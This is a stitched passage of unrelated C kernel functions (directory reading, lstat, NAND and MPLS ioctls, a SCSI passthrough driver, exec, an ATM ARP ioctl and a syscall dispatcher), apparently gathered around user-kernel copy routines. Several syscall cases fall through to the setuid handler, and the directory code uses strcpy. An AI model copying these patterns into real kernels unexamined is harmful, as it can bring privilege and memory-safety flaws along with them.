l->l_cred); VOP_UNLOCK(vp); if (error) goto out1; loff = fp->f_offset; nbytes = SCARG(uap, count); buflen = min(MAXBSIZE, nbytes); if (buflen < va.va_blocksize) buflen = va.va_blocksize; tbuf = malloc(buflen, M_TEMP, M_WAITOK); vn_lock(vp, LK_EXCLUSIVE | LK_RETRY); off = fp->f_offset; again: aiov.iov_base = tbuf; aiov.iov_len = buflen; auio.uio_iov = &aiov; auio.uio_iovcnt = 1; auio.uio_rw = UIO_READ; auio.uio_resid = buflen; auio.uio_offset = off; UIO_SETUP_SYSSPACE(&auio); /* * First we read into the malloc'ed buffer, then * we massage it into user space, one record at a time. */ error = VOP_READDIR(vp, &auio, fp->f_cred, &eofflag, &cookiebuf, &ncookies); if (error) goto out; inp = (char *)tbuf; outp = SCARG(uap, buf); resid = nbytes; if ((len = buflen - auio.uio_resid) == 0) goto eof; for (cookie = cookiebuf; len > 0; len -= reclen) { bdp = (struct dirent *)inp; reclen = bdp->d_reclen; if (reclen & 3) panic(__func__); if (bdp->d_fileno == 0) { inp += reclen; /* it is a hole; squish it out */ if (cookie) off = *cookie++; else off += reclen; continue; } old_reclen = _DIRENT_RECLEN(&idb, bdp->d_namlen); if (reclen > len || resid < old_reclen) { /* entry too big for buffer, so just stop */ outp++; break; } /* * Massage in place to make a Dirent12-shaped dirent (otherwise * we have to worry about touching user memory outside of * the copyout() call). */ idb.d_fileno = (uint32_t)bdp->d_fileno; idb.d_reclen = (uint16_t)old_reclen; idb.d_namlen = (uint16_t)bdp->d_namlen; strcpy(idb.d_name, bdp->d_name); if ((error = copyout(&idb, outp, old_reclen))) goto out; /* advance past this real entry */ inp += reclen; if (cookie) off = *cookie++; /* each entry points to itself */ else off += reclen; /* advance output past Dirent12-shaped entry */ outp += old_reclen; resid -= old_reclen; } /* if we squished out the whole block, try again */ if (outp == SCARG(uap, buf)) { if (cookiebuf) free(cookiebuf, M_TEMP); cookiebuf = NULL; goto again; } fp->f_offset = off; /* update the vnode offset */ eof: *retval = nbytes - resid; out: VOP_UNLOCK(vp); if (cookiebuf) free(cookiebuf, M_TEMP); free(tbuf, M_TEMP); out1: fd_putfile(SCARG(uap, fd)); if (error) return error; return copyout(&loff, SCARG(uap, basep), sizeof(long)); }
/* ARGSUSED */ int compat_43_sys_lstat(struct lwp *l, const struct compat_43_sys_lstat_args *uap, register_t *retval) { /* { syscallarg(char *) path; syscallarg(struct ostat *) ub; } */ struct vnode *vp, *dvp; struct stat sb, sb1; struct stat43 osb; int error; struct pathbuf *pb; struct nameidata nd; int ndflags; error = pathbuf_copyin(SCARG(uap, path), &pb); if (error) { return error; } ndflags = NOFOLLOW | LOCKLEAF | LOCKPARENT | TRYEMULROOT; again: NDINIT(&nd, LOOKUP, ndflags, pb); if ((error = namei(&nd))) { if (error == EISDIR && (ndflags & LOCKPARENT) != 0) { /* * Should only happen on '/'. Retry without LOCKPARENT; * this is safe since the vnode won't be a VLNK. */ ndflags &= ~LOCKPARENT; goto again; } pathbuf_destroy(pb); return (error); } /* * For symbolic links, always return the attributes of its * containing directory, except for mode, size, and links. */ vp = nd.ni_vp; dvp = nd.ni_dvp; pathbuf_destroy(pb); if (vp->v_type != VLNK) { if ((ndflags & LOCKPARENT) != 0) { if (dvp == vp) vrele(dvp); else vput(dvp); } error = vn_stat(vp, &sb); vput(vp); if (error) return (error); } else { error = vn_stat(dvp, &sb); vput(dvp); if (error) { vput(vp); return (error); } error = vn_stat(vp, &sb1); vput(vp); if (error) return (error); sb.st_mode &= ~S_IFDIR; sb.st_mode |= S_IFLNK; sb.st_nlink = sb1.st_nlink; sb.st_size = sb1.st_size; sb.st_blocks = sb1.st_blocks; } cvtstat(&sb, &osb); error = copyout((void *)&osb, (void *)SCARG(uap, ub), sizeof (osb)); return (error); }
static int nand_ioctl(struct cdev *dev, u_long cmd, caddr_t data, int fflag, struct thread *td) { struct nand_chip *chip; struct chip_geom *cg; struct nand_oob_rw *oob_rw = NULL; struct nand_raw_rw *raw_rw = NULL; device_t nandbus; size_t bufsize = 0, len = 0; size_t raw_size; off_t off; uint8_t *buf = NULL; int ret = 0; uint8_t status; chip = (struct nand_chip *)dev->si_drv1; cg = &chip->chip_geom; nandbus = device_get_parent(chip->dev); if ((cmd == NAND_IO_RAW_READ) || (cmd == NAND_IO_RAW_PROG)) { raw_rw = (struct nand_raw_rw *)data; raw_size = cg->pgs_per_blk * (cg->page_size + cg->oob_size); /* Check if len is not bigger than chip size */ if (raw_rw->len > raw_size) return (EFBIG); /* * Do not ask for too much memory, in case of large transfers * read/write in 16-pages chunks */ bufsize = 16 * (cg->page_size + cg->oob_size); if (raw_rw->len < bufsize) bufsize = raw_rw->len; buf = malloc(bufsize, M_NAND, M_WAITOK); len = raw_rw->len; off = 0; } switch(cmd) { case NAND_IO_ERASE: ret = nand_erase_blocks(chip, ((off_t *)data)[0], ((off_t *)data)[1]); break; case NAND_IO_OOB_READ: oob_rw = (struct nand_oob_rw *)data; ret = nand_oob_access(chip, oob_rw->page, 0, oob_rw->len, oob_rw->data, 0); break; case NAND_IO_OOB_PROG: oob_rw = (struct nand_oob_rw *)data; ret = nand_oob_access(chip, oob_rw->page, 0, oob_rw->len, oob_rw->data, 1); break; case NAND_IO_GET_STATUS: NANDBUS_LOCK(nandbus); ret = NANDBUS_GET_STATUS(nandbus, &status); if (ret == 0) *(uint8_t *)data = status; NANDBUS_UNLOCK(nandbus); break; case NAND_IO_RAW_PROG: while (len > 0) { if (len < bufsize) bufsize = len; ret = copyin(raw_rw->data + off, buf, bufsize); if (ret) break; ret = nand_prog_pages_raw(chip, raw_rw->off + off, buf, bufsize); if (ret) break; len -= bufsize; off += bufsize; } break; case NAND_IO_RAW_READ: while (len > 0) { if (len < bufsize) bufsize = len; ret = nand_read_pages_raw(chip, raw_rw->off + off, buf, bufsize); if (ret) break; ret = copyout(buf, raw_rw->data + off, bufsize); if (ret) break; len -= bufsize; off += bufsize; } break; case NAND_IO_PAGE_STAT: ret = nand_page_stat(chip, (struct page_stat_io *)data); break; case NAND_IO_BLOCK_STAT: ret = nand_block_stat(chip, (struct block_stat_io *)data); break; case NAND_IO_GET_CHIP_PARAM: nand_get_chip_param(chip, (struct chip_param_io *)data); break; default: printf("Unknown nand_ioctl request \n"); ret = EIO; } if (buf) free(buf, M_NAND); return (ret); }
int mpw_ioctl(struct ifnet *ifp, u_long cmd, caddr_t data) { struct ifreq *ifr = (struct ifreq *) data; struct mpw_softc *sc = ifp->if_softc; struct sockaddr_in *sin; struct sockaddr_in *sin_nexthop; int error = 0; int s; struct ifmpwreq imr; switch (cmd) { case SIOCSIFMTU: if (ifr->ifr_mtu < MPE_MTU_MIN || ifr->ifr_mtu > MPE_MTU_MAX) error = EINVAL; else ifp->if_mtu = ifr->ifr_mtu; break; case SIOCSIFFLAGS: if ((ifp->if_flags & IFF_UP)) ifp->if_flags |= IFF_RUNNING; else ifp->if_flags &= ~IFF_RUNNING; break; case SIOCSETMPWCFG: error = suser(curproc, 0); if (error != 0) break; error = copyin(ifr->ifr_data, &imr, sizeof(imr)); if (error != 0) break; /* Teardown all configuration if got no nexthop */ sin = (struct sockaddr_in *) &imr.imr_nexthop; if (sin->sin_addr.s_addr == 0) { s = splsoftnet(); if (rt_ifa_del(&sc->sc_ifa, RTF_MPLS, smplstosa(&sc->sc_smpls)) == 0) sc->sc_smpls.smpls_label = 0; splx(s); memset(&sc->sc_rshim, 0, sizeof(sc->sc_rshim)); memset(&sc->sc_nexthop, 0, sizeof(sc->sc_nexthop)); sc->sc_flags = 0; sc->sc_type = 0; break; } /* Validate input */ if (sin->sin_family != AF_INET || imr.imr_lshim.shim_label > MPLS_LABEL_MAX || imr.imr_lshim.shim_label <= MPLS_LABEL_RESERVED_MAX || imr.imr_rshim.shim_label > MPLS_LABEL_MAX || imr.imr_rshim.shim_label <= MPLS_LABEL_RESERVED_MAX) { error = EINVAL; break; } /* Setup labels and create inbound route */ imr.imr_lshim.shim_label = htonl(imr.imr_lshim.shim_label << MPLS_LABEL_OFFSET); imr.imr_rshim.shim_label = htonl(imr.imr_rshim.shim_label << MPLS_LABEL_OFFSET); if (sc->sc_smpls.smpls_label != imr.imr_lshim.shim_label) { s = splsoftnet(); if (sc->sc_smpls.smpls_label) rt_ifa_del(&sc->sc_ifa, RTF_MPLS, smplstosa(&sc->sc_smpls)); sc->sc_smpls.smpls_label = imr.imr_lshim.shim_label; error = rt_ifa_add(&sc->sc_ifa, RTF_MPLS, smplstosa(&sc->sc_smpls)); splx(s); if (error != 0) { sc->sc_smpls.smpls_label = 0; break; } } /* Apply configuration */ sc->sc_flags = imr.imr_flags; sc->sc_type = imr.imr_type; sc->sc_rshim.shim_label = imr.imr_rshim.shim_label; sc->sc_rshim.shim_label |= MPLS_BOS_MASK; memset(&sc->sc_nexthop, 0, sizeof(sc->sc_nexthop)); sin_nexthop = (struct sockaddr_in *) &sc->sc_nexthop; sin_nexthop->sin_family = sin->sin_family; sin_nexthop->sin_len = sizeof(struct sockaddr_in); sin_nexthop->sin_addr.s_addr = sin->sin_addr.s_addr; break; case SIOCGETMPWCFG: imr.imr_flags = sc->sc_flags; imr.imr_type = sc->sc_type; imr.imr_lshim.shim_label = ((ntohl(sc->sc_smpls.smpls_label & MPLS_LABEL_MASK)) >> MPLS_LABEL_OFFSET); imr.imr_rshim.shim_label = ((ntohl(sc->sc_rshim.shim_label & MPLS_LABEL_MASK)) >> MPLS_LABEL_OFFSET); memcpy(&imr.imr_nexthop, &sc->sc_nexthop, sizeof(imr.imr_nexthop)); error = copyout(&imr, ifr->ifr_data, sizeof(imr)); break; default: error = ENOTTY; break; } return (error); }
static int gsccmd(dev_t dev, scmd_t *argcmd, ulong dflag) { gsc_softc_t *sp; scmd_t local, *l; char sbyte, albits; struct sc_buf *usc; struct buf *Ubp; int r, r2, ival, upin, unit, rqvalid, once; unit = minor(dev); Trace2(1, "%d: cmd for unit %d", __LINE__, minor(dev)); if (unit < 0 || unit >= MAX_UNITS) { setuerror(ENXIO); return (ENXIO); } sp = &softinfo[unit]; if (sp->iscfg == 0 || sp->fp == NULL) { Trace2(0, "gsccmd: bad unit %d (cfg=%d)", unit, sp->iscfg); r = ENODEV; setuerror(r); return (r); } simple_lock(&sp->dd_lock); l = &local; if (dflag & DKERNEL) { l = argcmd; } else { r = copyin((caddr_t) argcmd, (caddr_t) l, sizeof (scmd_t)); if (r != 0) { Trace2(0, "%d: copyin=%d", __LINE__, r); setuerror(r); MJ_RTN (r); } } Trace6(1, "%d: cdblen%d datalen%d snslen%d rw=%d tv=%d", __LINE__, l->cdblen, l->datalen, l->senselen, l->rw, l->timeval); sbyte = 0; rqvalid = upin = r = r2 = 0; usc = &sp->cmdbuf; Ubp = &usc->bufstruct; memset(usc, 0, sizeof (struct sc_buf)); /* * Check some parameters... */ if (l->cdblen > sizeof (struct sc_cmd)) { r = EINVAL; goto out; } /* * Setup sc_buf structure */ Ubp->b_iodone = gscdd_intr; Ubp->b_dev = sp->dev; Ubp->b_flags = B_BUSY | B_MPSAFE; Ubp->b_resid = Ubp->b_bcount = l->datalen; Ubp->b_xmemd.aspace_id = XMEM_INVAL; Ubp->b_event = EVENT_NULL; if (l->datalen) { Ubp->b_un.b_addr = l->data_buf; if (l->rw) { Ubp->b_flags |= B_READ; } if (dflag & DKERNEL) { r = pinu(l->data_buf, l->datalen, UIO_SYSSPACE); } else { r = pinu(l->data_buf, l->datalen, UIO_USERSPACE); } if (r) { Trace2(0, "%d: pinu buf %d", __LINE__, r); goto out; } upin++; if (dflag & DKERNEL) { r = xmattach(l->data_buf, l->datalen, &Ubp->b_xmemd, SYS_ADSPACE); } else { r = xmattach(l->data_buf, l->datalen, &Ubp->b_xmemd, USER_ADSPACE); } if (r != XMEM_SUCC) { Trace2(0, "%d: xmattach %d", __LINE__, r); r = EFAULT; goto out; } upin++; r = xmemdma(&Ubp->b_xmemd, l->data_buf, XMEM_UNHIDE); if (r == XMEM_FAIL) { Trace2(0, "%d: xmemdma %d", __LINE__, r); r = EFAULT; goto out; } r = 0; } usc->scsi_command.scsi_id = sp->tgt; usc->scsi_command.scsi_length = l->cdblen; if (dflag & DKERNEL) { bcopy(l->cdb, (caddr_t)&usc->scsi_command.scsi_cmd, l->cdblen); } else { r = copyin(l->cdb, (caddr_t) & usc->scsi_command.scsi_cmd, l->cdblen); if (r != 0) { goto out; } } /* Setting lun in SCSI CDB as well as sc_buf structure */ usc->lun = sp->lun; usc->scsi_command.scsi_cmd.lun &= 0x1F; usc->scsi_command.scsi_cmd.lun |= (sp->lun << 5) & 0xE0; albits = usc->scsi_command.scsi_cmd.lun; usc->timeout_value = l->timeval; if (sp->needresume) { usc->flags |= SC_RESUME; sp->needresume = 0; } if (scudebug > 1) { char *c = (char *) &usc->scsi_command.scsi_cmd; char cdbuf[64]; (void) sprintf(cdbuf, "0x%02x 0x%02x 0x%02x 0x%02x 0x%02x 0x%02x " "0x%02x 0x%02x 0x%02x 0x%02x 0x%02x 0x%02x", c[0], c[1], c[2], c[3], c[4], c[5], c[6], c[7], c[8], c[9], c[10], c[11]); Trace2(0, "%d: cdb=%s", __LINE__, cdbuf); } once = 0; again: Ubp->b_flags &= ~B_DONE; r = devstrat(Ubp); if (r == 0) { ival = disable_lock(INTCLASS1, &sp->buf_lock); while ((Ubp->b_flags & B_DONE) == 0) { e_sleep_thread(&Ubp->b_event, &sp->buf_lock, LOCK_HANDLER); } unlock_enable(ival, &sp->buf_lock); } else { /* * If ENXIO, We never actually got started. */ if (r == ENXIO && once == 0) { once++; usc->flags |= SC_RESUME|SC_DELAY_CMD; goto again; } sp->needresume = 1; Trace2(1, "%d: devstrat=%d", __LINE__, r); goto out; } Trace4(1, "%d: b_flags %x b_error %d b_resid %d", __LINE__, Ubp->b_flags, Ubp->b_error, Ubp->b_resid); Trace5(1, "%d: sv %x st %x gc %x as %x", __LINE__, usc->status_validity, usc->scsi_status, usc->general_card_status, usc->adap_q_status); if (Ubp->b_flags & B_ERROR) { r = Ubp->b_error; sp->needresume = 1; } if (usc->status_validity & SC_SCSI_ERROR) { sbyte = (usc->scsi_status & SCSI_STATUS_MASK); sp->needresume = 1; if (sbyte == SC_CHECK_CONDITION && l->senselen) { struct sc_buf *usl; struct buf *Sbp; r = make_rqs(sp, albits, l->sense_buf, l->senselen, (dflag & DKERNEL) != 0); if (r) { Trace2(0, "%d: make_rqs=%d", __LINE__, r); goto out; } usl = &sp->rqsbuf; Sbp = &usl->bufstruct; r = devstrat(Sbp); if (r == 0) { ival = disable_lock(INTCLASS1, &sp->buf_lock); while ((Sbp->b_flags & B_DONE) == 0) { e_sleep_thread(&Sbp->b_event, &sp->buf_lock, LOCK_HANDLER); } unlock_enable(ival, &sp->buf_lock); } else { Trace2(0, "%d:ds=%d for rqs", __LINE__, r); goto out; } xmdetach(&Sbp->b_xmemd); if (dflag & DKERNEL) { (void) unpinu(l->sense_buf, l->senselen, UIO_SYSSPACE); } else { (void) unpinu(l->sense_buf, l->senselen, UIO_USERSPACE); } Trace4(1, "%d SENSE: b_flags %x b_error %d b_resid %d", __LINE__, Sbp->b_flags, Sbp->b_error, Sbp->b_resid); Trace5(1, "%d: sv %x st %x gc %x as %x", __LINE__, usl->status_validity, usl->scsi_status, usl->general_card_status, usl->adap_q_status); if (usl->scsi_status || usl->general_card_status) { r = EIO; } else { rqvalid = 1; } } } if (usc->status_validity & SC_ADAPTER_ERROR) { sp->needresume = 1; Trace2(0, "%d: adapter error 0x%x", __LINE__, usc->general_card_status); Ubp->b_flags |= B_ERROR; switch (usc->general_card_status) { case SC_NO_DEVICE_RESPONSE: case SC_HOST_IO_BUS_ERR: case SC_SCSI_BUS_FAULT: case SC_CMD_TIMEOUT: case SC_ADAPTER_HDW_FAILURE: case SC_ADAPTER_SFW_FAILURE: case SC_FUSE_OR_TERMINAL_PWR: case SC_SCSI_BUS_RESET: default: r = EIO; break; } } /* * Log errors through errsave function */ if (usc->status_validity & (SC_SCSI_ERROR|SC_ADAPTER_ERROR)) { struct sc_error_log_df log; memset(&log, 0, sizeof (log)); /* * All errors are 'temporary unknown driver error' */ log.error_id = ERRID_SCSI_ERR6; (void) sprintf(log.resource_name, "gsc%d", unit); memcpy(&log.scsi_command, &usc->scsi_command, sizeof (struct scsi)); log.status_validity = usc->status_validity; log.scsi_status = usc->scsi_status; log.general_card_status = usc->general_card_status; if (rqvalid) { int amt; if (l->senselen > 128) amt = 128; else amt = l->senselen; (void) copyin(l->sense_buf, log.req_sense_data, amt); } errsave(&log, sizeof (struct sc_error_log_df)); } if (dflag & DKERNEL) { *l->statusp = sbyte; } else { r2 = copyout(&sbyte, l->statusp, 1); if (r2 != 0) { if (r == 0) r = r2; goto out; } } out: if (l->datalen) { if (upin > 1) { xmdetach(&Ubp->b_xmemd); upin--; } if (upin > 0) { if (dflag & DKERNEL) { (void) unpinu(l->data_buf, l->datalen, UIO_SYSSPACE); } else { (void) unpinu(l->data_buf, l->datalen, UIO_USERSPACE); } upin--; } } Trace2(1, "%d: returning %d", __LINE__, r); if (r) setuerror(r); MJ_RTN (r); }
int exec(char *path, char **argv) { char *s, *last; int i, off; uint argc, sz, sp, ustack[3+MAXARG+1]; struct elfhdr elf; struct inode *ip; struct proghdr ph; pde_t *pgdir, *oldpgdir; if((ip = namei(path)) == 0) return -1; ilock(ip); pgdir = 0; // Check ELF header if(readi(ip, (char*)&elf, 0, sizeof(elf)) < sizeof(elf)) goto bad; if(elf.magic != ELF_MAGIC) goto bad; if((pgdir = setupkvm(kalloc)) == 0) goto bad; // Load program into memory. // leave first page inaccessible (to make NULL ref fail) sz = PGSIZE-1; for(i=0, off=elf.phoff; i<elf.phnum; i++, off+=sizeof(ph)){ if(readi(ip, (char*)&ph, off, sizeof(ph)) != sizeof(ph)) goto bad; if(ph.type != ELF_PROG_LOAD) continue; if(ph.memsz < ph.filesz) goto bad; if((sz = allocuvm(pgdir, sz, ph.vaddr + ph.memsz)) == 0) goto bad; if(loaduvm(pgdir, (char*)ph.vaddr, ip, ph.off, ph.filesz) < 0) goto bad; } iunlockput(ip); ip = 0; // Allocate two pages at the next page boundary. // Make the first inaccessible. Use the second as the user stack. sz = PGROUNDUP(sz); if((sz = allocuvm(pgdir, sz, sz + 2*PGSIZE)) == 0) goto bad; clearpteu(pgdir, (char*)(sz - 2*PGSIZE)); sp = sz; // Push argument strings, prepare rest of stack in ustack. for(argc = 0; argv[argc]; argc++) { if(argc >= MAXARG) goto bad; sp = (sp - (strlen(argv[argc]) + 1)) & ~3; if(copyout(pgdir, sp, argv[argc], strlen(argv[argc]) + 1) < 0) goto bad; ustack[3+argc] = sp; } ustack[3+argc] = 0; ustack[0] = 0xffffffff; // fake return PC ustack[1] = argc; ustack[2] = sp - (argc+1)*4; // argv pointer sp -= (3+argc+1) * 4; if(copyout(pgdir, sp, ustack, (3+argc+1)*4) < 0) goto bad; // Save program name for debugging. for(last=s=path; *s; s++) if(*s == '/') last = s+1; safestrcpy(proc->name, last, sizeof(proc->name)); // hook up the old shared memory to the new addr space // (no need to change refcount, because the old ref goes away with // this exec, so it's +1 then -1 => 0 change if (proc->shared) { extern void mappages(pde_t *pgdir, void *va, uint size, uint pa, int perm); mappages(pgdir, (char *)SHARED_V, PGSIZE, v2p(proc->shared->page), PTE_W|PTE_U); } // Commit to the user image. oldpgdir = proc->pgdir; proc->pgdir = pgdir; proc->sz = sz; proc->tf->eip = elf.entry; // main proc->tf->esp = sp; switchuvm(proc); freevm(oldpgdir); return 0; bad: if(pgdir) freevm(pgdir); if(ip) iunlockput(ip); return -1; }
/* * SPANS ARP IOCTL support * * Function will be called from a critical section. * * Arguments: * code PF_ATM sub-operation code * data pointer to code specific parameter data area * arg1 pointer to code specific argument * * Returns: * 0 request procesed * errno error processing request - reason indicated * */ int spansarp_ioctl(int code, caddr_t data, caddr_t arg1) { struct atmaddreq *aap; struct atmdelreq *adp; struct atminfreq *aip; struct spans *spp; struct spanscls *clp; struct spansarp *sap; struct air_arp_rsp aar; struct ip_nif *inp; struct ipvcc *ivp, *inext; struct in_addr ip; u_long dst; int err = 0, i, buf_len; caddr_t buf_addr; switch (code) { case AIOCS_ADD_ARP: /* * Add a permanent ARP mapping */ aap = (struct atmaddreq *)data; clp = (struct spanscls *)arg1; inp = clp->cls_ipnif; if ((aap->aar_arp_addr.address_format != T_ATM_SPANS_ADDR) || (aap->aar_arp_origin != ARP_ORIG_PERM)) { err = EINVAL; break; } ip = SATOSIN(&aap->aar_arp_dst)->sin_addr; /* * See if we already have an entry for this IP address */ SPANSARP_LOOKUP(ip.s_addr, sap); if (sap == NULL) { /* * No, get a new arp entry */ sap = (struct spansarp *)atm_allocate(&spansarp_pool); if (sap == NULL) { err = ENOMEM; break; } /* * Get entry set up */ sap->sa_dstip = ip; ATM_ADDR_COPY(&aap->aar_arp_addr, &sap->sa_dstatm); sap->sa_dstatmsub.address_format = T_ATM_ABSENT; sap->sa_dstatmsub.address_length = 0; sap->sa_cls = clp; sap->sa_flags |= SAF_VALID; sap->sa_origin = SAO_PERM; /* * Add entry to table */ SPANSARP_ADD(sap); break; } /* * See if we're attempting to change the ATM address for * this cached entry */ if ((sap->sa_dstatm.address_format != T_ATM_ABSENT) && (!ATM_ADDR_EQUAL(&aap->aar_arp_addr, &sap->sa_dstatm) || (clp != sap->sa_cls))) { /* * Yes, notify IP/ATM that a mapping change has * occurred. IP/ATM will close any VCC's which * aren't waiting for this map. */ sap->sa_flags |= SAF_LOCKED; for (ivp = sap->sa_ivp; ivp; ivp = inext) { inext = ivp->iv_arpnext; (*inp->inf_arpnotify)(ivp, MAP_CHANGED); } sap->sa_flags &= ~SAF_LOCKED; } /* * Update the cached entry with the new data */ ATM_ADDR_COPY(&aap->aar_arp_addr, &sap->sa_dstatm); sap->sa_cls = clp; /* * If this entry isn't valid, notify anyone who might * be interested */ if ((sap->sa_flags & SAF_VALID) == 0) { sap->sa_flags |= SAF_LOCKED; for (ivp = sap->sa_ivp; ivp; ivp = inext) { inext = ivp->iv_arpnext; (*inp->inf_arpnotify)(ivp, MAP_VALID); } sap->sa_flags &= ~SAF_LOCKED; } /* * Remove this entry from the retry chain */ UNLINK(sap, struct spansarp, spansarp_retry_head, sa_rnext); /* * Mark the entry as permanent */ sap->sa_flags |= SAF_VALID; sap->sa_origin = SAO_PERM; break; case AIOCS_DEL_ARP: /* * Delete an ARP mapping */ adp = (struct atmdelreq *)data; clp = (struct spanscls *)arg1; ip = SATOSIN(&adp->adr_arp_dst)->sin_addr; /* * Now find the entry to be deleted */ SPANSARP_LOOKUP(ip.s_addr, sap); if (sap == NULL) { err = ENOENT; break; } /* * Notify all VCCs using this entry that they must finish * up now. */ sap->sa_flags |= SAF_LOCKED; for (ivp = sap->sa_ivp; ivp; ivp = inext) { inext = ivp->iv_arpnext; (*ivp->iv_ipnif->inf_arpnotify)(ivp, MAP_FAILED); } /* * Now free up the entry */ UNLINK(sap, struct spansarp, spansarp_retry_head, sa_rnext); SPANSARP_DELETE(sap); atm_free((caddr_t)sap); break; case AIOCS_INF_ARP: /* * Get ARP table information */ aip = (struct atminfreq *)data; spp = (struct spans *)arg1; if (aip->air_arp_addr.sa_family != AF_INET) break; dst = SATOSIN(&aip->air_arp_addr)->sin_addr.s_addr; buf_addr = aip->air_buf_addr; buf_len = aip->air_buf_len; if ((clp = spp->sp_cls) == NULL) break; /* * Run through entire arp table */ for (i = 0; i < SPANSARP_HASHSIZ; i++) { for (sap = spansarp_arptab[i]; sap; sap = sap->sa_next) { /* * We only want entries learned * from the supplied interface. */ if (sap->sa_cls != clp) continue; if ((dst != INADDR_ANY) && (dst != sap->sa_dstip.s_addr)) continue; /* * Make sure there's room in the user's buffer */ if (buf_len < sizeof(aar)) { err = ENOSPC; break; } /* * Fill in info to be returned */ SATOSIN(&aar.aap_arp_addr)->sin_family = AF_INET; SATOSIN(&aar.aap_arp_addr)->sin_addr.s_addr = sap->sa_dstip.s_addr; strlcpy(aar.aap_intf, clp->cls_ipnif->inf_nif->nif_if.if_xname, sizeof(aar.aap_intf)); aar.aap_flags = sap->sa_flags; aar.aap_origin = sap->sa_origin; if (sap->sa_flags & SAF_VALID) aar.aap_age = SPANSARP_MAXAGE - sap->sa_reftime; else aar.aap_age = 0; ATM_ADDR_COPY(&sap->sa_dstatm, &aar.aap_addr); ATM_ADDR_COPY(&sap->sa_dstatmsub, &aar.aap_subaddr); /* * Copy the response into the user's buffer */ if ((err = copyout((caddr_t)&aar, buf_addr, sizeof(aar))) != 0) break; buf_addr += sizeof(aar); buf_len -= sizeof(aar); } if (err) break; } /* * Update the buffer pointer and length */ aip->air_buf_addr = buf_addr; aip->air_buf_len = buf_len; break; case AIOCS_INF_ASV: /* * Get ARP server information */ /* SPANS doesn't have an ARP server */ break; default: err = EOPNOTSUPP; } return (err); }
static void do_syscall_sw( uuprocess_t *u, struct trap_state *st) { #if HAVE_UNIX int callno = st->eax; /* unsigned int mina = 0, maxa = 0; { extern struct real_descriptor ldt[]; struct real_descriptor dsd = ldt[ st->ds/8 ]; mina = dsd.base_low | (dsd.base_med << 16) | (dsd.base_high << 24); maxa = (dsd.limit_low | dsd.limit_high << 16); if( dsd.granularity & SZ_G) maxa *= PAGE_SIZE; maxa += mina; } */ //phantom_thread_t *t = GET_CURRENT_THREAD(); //uuprocess_t *u = t->u; /* tid_t tid = get_current_tid(); pid_t pid; assert( !t_get_pid( tid, &pid )); uuprocess_t *u = proc_by_pid(pid); */ assert( u != 0 ); unsigned int mina = (int)u->mem_start, maxa = (int)u->mem_end; // trap state is good for interrupt. // call gate does not push eflags int user_esp = st->eflags; #ifndef ARCH_ia32 # warning machdep ia32 arg pass convention #endif // list of user syscsall arguments int *uarg = adjustin( user_esp, st ); uarg++; // syscall func return addr //SHOW_FLOW( 10, "Syscall pid %2d tid %2d, our esp %p, user esp %p, t kstack %p", u->pid, t->tid, &st, user_esp, t->kstack_top ); SHOW_FLOW( 8, "Syscall %d args %x, %x, %x", callno, uarg[0], uarg[1],uarg[2] ); int ret = 0; int err = 0; switch(callno) { case SYS__exit: // TODO housekeeping? SHOW_FLOW( 2, "exit %d", uarg[0] ); hal_exit_kernel_thread(); err = ENOSYS; break; case SYS_ssyslog: syslog( uarg[0], "%s", (const char *)adjustin( uarg[1], st ) ); SHOW_FLOW( 2, "syslog %d %s", uarg[0], (const char *)adjustin( uarg[1], st ) ); //SHOW_ERROR0( 0, "syslog not impl" ); break; case SYS_sleepmsec: //SHOW_FLOW( 2, "sleepmsec %d", uarg[0] ); hal_sleep_msec(uarg[0]); break; case SYS_getpagesize: ret = PAGE_SIZE; break; case SYS_personality: if( ((unsigned) uarg[0]) == 0xffffffff) { ret = 0; // Say we're Linux... well...to some extent. break; } err = EINVAL; break; case SYS_uname: err = copyout(uarg[0], mina, maxa, &phantom_uname, sizeof(phantom_uname) ); if( err ) ret = -1; break; case SYS_getuid: ret = u->uid; break; case SYS_getuid32: ret = u->uid;; break; case SYS_getegid: ret = u->egid; break; case SYS_getegid32: ret = u->egid; break; case SYS_geteuid: ret = u->euid; break; case SYS_geteuid32: ret = u->euid; break; case SYS_getgid: ret = u->gid; break; case SYS_getgid32: ret = u->gid; break; case SYS_gettid: ret = get_current_tid(); break; case SYS_getpid: ret = u->pid; break; case SYS_getpgrp: ret = u->pgrp_pid; break; case SYS_getppid: ret = u->ppid; break; case SYS_getpgid: goto unimpl; case SYS_time: { time_t t = time(0); AARG(time_t *, tp, 0, sizeof(time_t)); *tp = t; ret = t; break; } case SYS_nanosleep: // todo check for POSIX compliance, make it interruptible by signals //int nanosleep(const struct timespec *, struct timespec *); { goto unimpl; //AARG(struct timespec *, req_time, 0, sizeof(struct timespec)); //AARG(struct timespec *, rest_time, 1, sizeof(struct timespec)); //ret = usys_nanosleep( &err, u, req_time, rest_time ); //break; } case SYS_sync: case SYS_sysinfo: case SYS_sysfs: case SYS_klogctl: case SYS_shutdown: case SYS_reboot: case SYS_getitimer: case SYS_setitimer: case SYS_gettimeofday: case SYS_setuid: case SYS_setuid32: CHECK_CAP(CAP_SETUID); u->euid = uarg[0]; break; case SYS_setgid: case SYS_setgid32: CHECK_CAP(CAP_SETGID); u->egid = uarg[0]; break; case SYS_setgroups: case SYS_setgroups32: goto unimpl; case SYS_setpgid: case SYS_setregid: case SYS_setregid32: case SYS_setresgid: case SYS_setresgid32: case SYS_setresuid: case SYS_setresuid32: case SYS_setreuid: case SYS_setreuid32: goto unimpl; case SYS_open: ret = usys_open(&err, u, adjustin( uarg[0], st ), uarg[1], uarg[2] ); break; case SYS_close: ret = usys_close(&err, u, uarg[0] ); break; case SYS_read: { int count = uarg[2]; void *addr = adjustin( uarg[1], st ); CHECKA(addr,count); ret = usys_read(&err, u, uarg[0], addr, count ); break; } case SYS_write: { int count = uarg[2]; void *addr = adjustin( uarg[1], st ); CHECKA(addr,count); ret = usys_write(&err, u, uarg[0], addr, count ); break; } case SYS_lseek: ret = usys_lseek(&err, u, uarg[0], uarg[1], uarg[2] ); break; case SYS_creat: ret = usys_creat(&err, u, adjustin( uarg[0], st ), uarg[1] ); break; case SYS_chdir: { AARG(const char *, path, 0, 0); ret = usys_chdir(&err, u, path ); break; } case SYS_pipe: { AARG(int *, fds, 0, sizeof(int) * 2); ret = usys_pipe( &err, u, fds ); break; } case SYS_rmdir: case SYS_unlink: { AARG(const char *, name, 0, 1); ret = usys_rm( &err, u, name ); break; } case SYS_dup: ret = usys_dup( &err, u, uarg[0] ); break; case SYS_dup2: ret = usys_dup2( &err, u, uarg[0], uarg[1] ); break; case SYS_symlink: { AARG(const char *, n1, 0, 1); AARG(const char *, n2, 1, 1); ret = usys_symlink( &err, u, n1, 